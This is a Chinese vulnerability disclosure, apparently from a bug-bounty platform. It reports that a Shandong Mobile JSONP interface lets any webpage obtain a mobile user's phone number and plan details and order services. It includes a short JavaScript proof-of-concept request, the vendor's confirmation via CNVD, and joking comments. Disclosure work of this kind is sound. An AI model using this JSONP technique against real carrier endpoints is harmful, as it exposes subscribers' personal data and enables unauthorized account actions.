山东移动某接口可任意调用导致手机号码泄露办理各种业务

山东移动在使用3/4G的时候，会在网页中插入一段js，然后在网页右下角显示一个流量球，显示你当前剩余流量，点击流量球还可以办理业务。

但是在js进行ajax请求查询的时候没有进行有效的安全校验，导致用户在使用3/4G的时候该接口可以被任意网页js调用，可以获取用户手机号码，当前已经办理的业务，当前的套餐情况，办理各种套餐等。

获取手机号的poc

var angular = {"callbacks": {"_y": function(data){console.log(data);alert(data.respparam.phoneNumber);}}};
 $.ajax({
         url: "http://**.**.**.**:8080/html/servicereq/queryMessageList?callback=angular.callbacks._y&csession=-1648015146&reqparam=%7B%22flag%22:%22-1%22,%22startNum%22:%221%22,%22number%22:%2210%22%7D&templateId=fullscreenbar",
         method: "get",
         dataType: "jsonp",
         jsonp: "angular.callbacks._y",
 })

办理业务和获取套餐信息同理

你们更懂

厂商回应：

危害等级：中

漏洞Rank：9

确认时间：2016-03-25 18:00

厂商回复：

CNVD确认所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态：

暂无

1. 2016-03-23 12:42 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

   1

   给我冲个花费

   1# 回复此人

2. 2016-03-23 15:01 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

   1

   @j14n 这个漏洞能帮你花话费 ：P

   2# 回复此人

3. 2016-03-23 15:18 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

   1

   @疯狗 -_-!还是留着打电话吧!

   3# 回复此人